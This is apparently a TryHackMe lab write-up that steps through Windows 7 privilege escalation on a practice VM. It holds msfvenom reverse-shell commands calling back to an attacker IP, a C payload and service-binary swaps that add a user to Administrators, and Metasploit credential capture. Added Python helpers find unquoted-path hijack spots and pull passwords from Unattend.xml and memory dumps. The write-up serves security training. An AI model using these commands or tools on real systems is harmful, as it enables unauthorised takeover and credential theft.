Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
THM Room https://tryhackme.com/room/windowsprivescarena
TASK 1 : Connecting to TryHackMe network
I’ve read the intro and deployed the attached virtual machine.
No Answer
TASK 2 : Deploy the vulnerable machine
Deploy the machine and log into the user account via RDP
No Answer
Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?
Answer : TCM
TASK 3 : Registry Escalation - Autorun
Click ‘Completed’ once you have successfully elevated the machine
First, I looked in Autoruns64.exe for “program.exe”, then checked with accesschk that the group “Everyone” has the “FILE_ALL_ACCESS” permission on it :
After building a program.exe reverse shell with msfvenom on the attacker machine :
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.135.148 -f exe -o program.exe
I uploaded it to the “C:\Program Files\Autorun Program” directory (served from a python3 HTTP server on the attacker machine).
Then launched a handler in Metasploit and logged back in to an admin session to simulate an administrator logon :
I got an active meterpreter session. Let’s check the user’s groups :
No Answer.
TASK 4 : Registry Escalation - AlwaysInstallElevated
Click ‘Completed’ once you have successfully elevated the machine
First, checking that the AlwaysInstallElevated registry value is set to 1 (it has to be 1 under both HKLM and HKCU for the technique to work) :
AlwaysInstallElevated Registry Key
Then creating an MSI reverse shell installer with msfvenom :
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.199.49 lport=4545 -f msi -o setup.msi
With a simple Python HTTP server, I downloaded the file onto the target and then ran the command :
In the Metasploit listener launched earlier, I received a shell with SYSTEM rights :
No Answer.
TASK 5 : Service Escalation - Registry
Click ‘Completed’ once you have successfully elevated the machine
Compiled the C code, with the system() call changed to add the user to the local administrators group, into x.exe (only the Run() function of the service skeleton is shown; the rest of the file is unchanged) :
[...]
//add the payload here
int Run()
{
    // original payload from the skeleton, left commented out
    //system("whoami > c:\\windows\\temp\\service.txt");
    // runs in the service's security context (LocalSystem), so net localgroup succeeds
    system("cmd.exe /k net localgroup administrators user /add");
    return 0;
}
[...]
Then copied x.exe to the target and started the service :
We can see that our local user has been added to the local Administrators group.
No Answer.
TASK 6 : Service Escalation - Executable Files
Click ‘Completed’ once you have successfully elevated the machine
Detection of the vulnerability :
The filepermservice.exe file has the “FILE_ALL_ACCESS” permission set for Everyone.
Exploitation : reused the x.exe from the previous task and copied it over filepermservice.exe to replace it :
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
Then started the service :
sc start filepermsvc
Our user is now a member of the local Administrators group :
No Answer
TASK 7 : Privilege Escalation - Startup Applications
Click ‘Completed’ once you have successfully elevated the machine
New payload generated :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.199.49 LPORT=53 -f exe -o x.exe
Detection :
The Users group has F (full access) permission on the Startup folder, as intended.
Exploitation :
Let’s download our new exe file into this folder.
Then, once an admin user logged in, I received a privileged shell :
No Answer
TASK 8 : Service Escalation - DLL Hijacking
Click ‘Completed’ once you have successfully elevated the machine
First, I created the modified DLL from the file provided in the room :
Then restarted the dllsvc service :
No Answer.
TASK 9 : Service Escalation - binPath
Click ‘Completed’ once you have successfully elevated the machine
First, checked that the user has the “SERVICE_CHANGE_CONFIG” permission on the service :
Then added our user to the local Administrators group :
No Answer
TASK 10 : Service Escalation - Unquoted Service Paths
Click ‘Completed’ once you have successfully elevated the machine
Checking that I can exploit an unquoted path :
Built an exe that adds the user to the local Administrators group :
Launching the exploit :
No Answer
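As an added example (not code from the original write-up), here is the offline half of the check above in Python: it pulls BINARY_PATH_NAME out of `sc qc` output and lists, in order, the executables Windows would try before the real one when that path is unquoted and contains spaces, plus the directories whose permissions then need checking. The `sc qc` text is a constructed sample in the real format; the service name and path in it are assumptions, not output captured from the room's VM.

```python
import re
from typing import List

# Constructed sample in the format printed by `sc qc <service>`. The service name
# and path are assumptions for this example, not output captured from the room's VM.
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def sc_qc_field(text: str, field: str) -> str:
    """Value of one `FIELD : value` line from `sc qc` output ("" if absent)."""
    m = re.search(r"^\s*" + re.escape(field) + r"\s*:\s*(.*?)\s*$", text, re.MULTILINE)
    return m.group(1) if m else ""


def hijack_candidates(binary_path: str) -> List[str]:
    """Executables CreateProcess would try, in order, before reaching the real one.

    With an unquoted command line every space is a possible end of the program
    name; Windows tries each prefix, appending ".exe" when it has no extension.
    A quoted path, or a path with no space before the executable, yields nothing.
    """
    path = binary_path.strip()
    if not path or path.startswith('"'):
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # real binary reached; everything after it is arguments
        candidates.append(prefix + ".exe")
    return candidates


def directories_to_check(candidates: List[str]) -> List[str]:
    """Directories that must be writable for one of the candidates to be planted."""
    return sorted({c.rsplit("\\", 1)[0] + "\\" for c in candidates})


if __name__ == "__main__":
    path = sc_qc_field(SAMPLE_SC_QC, "BINARY_PATH_NAME")
    print("service runs as:", sc_qc_field(SAMPLE_SC_QC, "SERVICE_START_NAME"))
    for candidate in hijack_candidates(path):
        print("would be tried before the real binary:", candidate)
    for directory in directories_to_check(hijack_candidates(path)):
        print("check write access with icacls:", directory)
```

The writable check itself has to run on the target: `icacls "C:\Program Files\Unquoted Path Service\"` and look for (W), (M) or (F) granted to Users, Everyone or Authenticated Users. The payload exe goes into the first such directory under the candidate name, and the service picks it up on the next `sc stop` / `sc start` (or at boot when START_TYPE is AUTO_START).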
TASK 11 : Potato Escalation - Hot Potato
Click ‘Completed’ once you have successfully elevated the machine
“Hot potato is the code name of a Windows privilege escalation technique that was discovered by Stephen Breen. This technique is actually a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.” (source: pentestlab.blog, https://pentestlab.blog/2017/04/13/hot-potato/)
Executing the provided script for the Hot Potato exploit :
It added our user to the local Administrators group.
No Answer.
TASK 12 : Password Mining Escalation - Configuration Files
What is the cleartext password found in Unattend.xml?
An unexpected password was found in the XML configuration file :
It is base64 encoded, so I need to decode it :
Answer : password123
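As an added example (not code from the original write-up), a small Python helper that pulls every password element out of an Unattend.xml and decodes it. The sample XML is constructed for this example: its first Password value is the plain base64 found in the room, its second is stored the way Windows System Image Manager writes them (UTF-16LE text with the element name, "Password", appended before base64 encoding), which the decoder strips. The account names in the sample are assumptions.

```python
import base64
import xml.etree.ElementTree as ET
from typing import List, Tuple

NS = "urn:schemas-microsoft-com:unattend"

# Constructed sample, not the room's Unattend.xml; account names are assumptions.
# First value: plain base64 as found in the room. Second value: stored the way
# Windows System Image Manager writes it (UTF-16LE, "Password" appended, then base64).
_SIM_STYLE_VALUE = base64.b64encode(
    ("Winter2024!" + "Password").encode("utf-16-le")
).decode("ascii")

SAMPLE_UNATTEND = f"""<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>cGFzc3dvcmQxMjM=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>{_SIM_STYLE_VALUE}</Value>
              <PlainText>false</PlainText>
            </Password>
            <Name>svc_backup</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def _child_text(elem, tag: str) -> str:
    child = elem.find(f"{{{NS}}}{tag}")
    return (child.text or "").strip() if child is not None else ""


def decode_unattend_value(value: str, element_tag: str, plain_text: bool) -> str:
    """Turn a <Value> into the cleartext password.

    Hand-edited files usually hold plain base64 of an ASCII string; files produced
    by Windows System Image Manager hold base64 of UTF-16LE text with the element
    name ("Password" / "AdministratorPassword") appended. Both cases are handled.
    """
    if plain_text:
        return value
    raw = base64.b64decode(value)
    text = raw.decode("utf-16-le", "replace") if b"\x00" in raw else raw.decode("utf-8", "replace")
    if text.endswith(element_tag):
        text = text[: -len(element_tag)]
    return text


def find_unattend_passwords(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (context element, account, cleartext password) for every password element."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]
        if tag not in ("Password", "AdministratorPassword"):
            continue
        value = _child_text(elem, "Value")
        if not value:
            continue
        plain = _child_text(elem, "PlainText").lower() == "true"
        parent = parents[elem]
        context = parent.tag.split("}")[-1]
        if tag == "AdministratorPassword":
            account = "Administrator"
        else:
            account = _child_text(parent, "Username") or _child_text(parent, "Name") or "(unknown)"
        found.append((context, account, decode_unattend_value(value, tag, plain)))
    return found


if __name__ == "__main__":
    for context, account, password in find_unattend_passwords(SAMPLE_UNATTEND):
        print(f"{context}: {account} -> {password}")
```

The same file is worth checking in every location Windows leaves it (C:\Windows\Panther\, C:\Windows\Panther\Unattend\, C:\Windows\System32\Sysprep\), and the decoded AutoLogon credential is typically a local administrator, as it was here.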
TASK 13 : Password Mining Escalation - Memory
Click ‘Completed’ once you have successfully found all the passwords
Started msfconsole and ran the following commands :
use auxiliary/server/capture/http_basic
set uripath x
set SRVPORT 8888
run
Then I browsed to http://10.10.199.49:8888/x from the Windows target and got an error while connecting. So I created a dump file of Internet Explorer via the Task Manager :
Next I ran an SMB server on Kali :
sudo python3 /opt/impackets/examples/smbserver.py kali .
so that I could transfer the dump files from Windows to the Kali machine :
The strings command didn’t return anything :
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
But in the Metasploit capture module, I did get the password :
No Answer
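As an added example (not code from the original write-up), a Python scanner that does offline what the strings | grep pipeline above attempts, but looks for the Basic header both as 8-bit text and as UTF-16LE. Windows applications hold most of their strings in memory as UTF-16LE, and plain `strings` does not print those (GNU strings needs `-e l` for them), which is one reason such a search can come up empty. The dump bytes and the credentials inside them are constructed for this example, not taken from the room's iexplore.DMP.

```python
import base64
import binascii
import re
from typing import List, Tuple

B64_ALPHABET = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
ASCII_HEADER = re.compile(rb"Authorization: Basic ([A-Za-z0-9+/=]+)")
WIDE_NEEDLE = "Authorization: Basic ".encode("utf-16-le")


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process dump (not a real iexplore.DMP).

    One request is stored as 8-bit text and one as UTF-16LE, which is how a Windows
    process usually keeps its strings; plain `strings` only shows the first.
    """
    filler = bytes(range(256)) * 8
    ascii_req = (b"GET /x HTTP/1.1\r\nHost: 10.10.199.49:8888\r\nAuthorization: Basic "
                 + base64.b64encode(b"alice:S3cret!Pass") + b"\r\n\r\n")
    wide_req = ("Authorization: Basic " + base64.b64encode(b"bob:Winter-2024").decode("ascii")
                + "\r\n").encode("utf-16-le")
    return filler + ascii_req + filler + wide_req + filler


def _split_credential(token: str) -> Tuple[str, str]:
    """base64 'user:password' -> (user, password); tolerate padding cut off by the dump."""
    token += "=" * (-len(token) % 4)
    try:
        user, _, password = base64.b64decode(token).decode("utf-8", "replace").partition(":")
    except binascii.Error:
        return (token, "<undecodable>")
    return (user, password)


def find_basic_auth(dump: bytes) -> List[Tuple[str, str, str]]:
    """Return (encoding, user, password) for every Basic header found in the blob."""
    hits = []
    for m in ASCII_HEADER.finditer(dump):
        hits.append(("ascii",) + _split_credential(m.group(1).decode("ascii")))
    pos = dump.find(WIDE_NEEDLE)
    while pos != -1:
        i = pos + len(WIDE_NEEDLE)
        token = bytearray()
        # UTF-16LE base64 token: each character is an ASCII byte followed by 0x00
        while i + 1 < len(dump) and dump[i] in B64_ALPHABET and dump[i + 1] == 0:
            token.append(dump[i])
            i += 2
        hits.append(("utf-16-le",) + _split_credential(token.decode("ascii")))
        pos = dump.find(WIDE_NEEDLE, i)
    return hits


if __name__ == "__main__":
    for encoding, user, password in find_basic_auth(build_sample_dump()):
        print(f"[{encoding}] {user}:{password}")
```

Against a real Task Manager dump, run it as `find_basic_auth(open("iexplore.DMP", "rb").read())`; the equivalent quick check from the shell is `strings -e l iexplore.DMP | grep "Authorization: Basic"` next to the 8-bit search already on the page.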
TASK 14 : Privilege Escalation - Kernel Exploits
Click ‘Completed’ once you have successfully elevated the machine
The msfvenom payload kept crashing for me, even when changing settings like the encoder or the architecture.
When the reverse shell was established, it instantly died.
No Answer